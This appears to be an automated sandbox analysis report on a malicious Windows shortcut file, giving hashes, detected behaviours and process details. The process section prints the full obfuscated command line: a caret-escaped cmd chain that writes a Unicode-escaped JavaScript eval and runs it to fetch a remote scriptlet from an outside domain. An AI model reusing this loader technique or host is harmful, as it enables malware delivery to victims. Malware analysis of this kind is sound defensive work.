Analysis
-
max time kernel
28s -
max time network
32s -
platform
windows7_x64 -
resource
win7-20230220-en -
resource tags
-
submitted
30-05-2023 05:52
General
-
Target
CBM_Vistoria82783048885553654586815.699179.38512.lNk.lnk
-
Size
1KB
-
MD5
b7403fafb97aa69f0a86293526092727
-
SHA1
4b3c92feebd81f1ad2020347ad8c02875a381e25
-
SHA256
103d4b2be6c41f858cc52802535ea78502f5fab702704fc39e67a2c7d1c565ee
-
SHA512
855d69184902233344de40d9c9115bb9598a7ce6986878f24a25bb59d364354611a78282480b0cc2e4748b2a77e48d153a39247fd49d6e0e17b93b4edab092fe
Score
3/10
Malware Config
Signatures
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious use of WriteProcessMemory 3 IoCs
Processes
-
C:\Windows\system32\cmd.execmd /c C:\Users\Admin\AppData\Local\Temp\CBM_Vistoria82783048885553654586815.699179.38512.lNk.lnk1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\conhost.exe"C:\Windows\System32\conhost.exe" C:\Windows\system32\cmd.exe /V/D/c "md C:\U6aGT85\>nul 2>&1 &&s^eT XYXC=C:\U6aGT85\^U6aGT85.^Js&&echo eval('\u0076\u0061\u0072\u0020\u0043\u0054\u0059\u0045\u003d\u0022\u0073\u0022\u002b\u0022\u0063\u0072\u0022\u003b\u0044\u0054\u0059\u0045\u003d\u0022\u0069\u0070\u0074\u0022\u002b\u0022\u003a\u0068\u0022\u003b\u0045\u0054\u0059\u0045\u003d\u0022\u0054\u0074\u0022\u002b\u0022\u0050\u003a\u0022\u003b\u0047\u0065\u0074\u004f\u0062\u006a\u0065\u0063\u0074\u0028\u0043\u0054\u0059\u0045\u002b\u0044\u0054\u0059\u0045\u002b\u0045\u0054\u0059\u0045\u002b\u0022\u002f\u002f\u0035\u0076\u0065\u0072\u0031\u0074\u0070\u0065\u006f\u0038\u0074\u002e\u006c\u0069\u0063\u0065\u006e\u0063\u0069\u0061\u006d\u0065\u006e\u0074\u006f\u006d\u0065\u0065\u006e\u0074\u0072\u0065\u0067\u0061\u002e\u0063\u006f\u006d\u002f\u003f\u0031\u002f\u0022\u0029\u003b'); >!XYXC!&&ca^ll !XYXC!"2⤵
-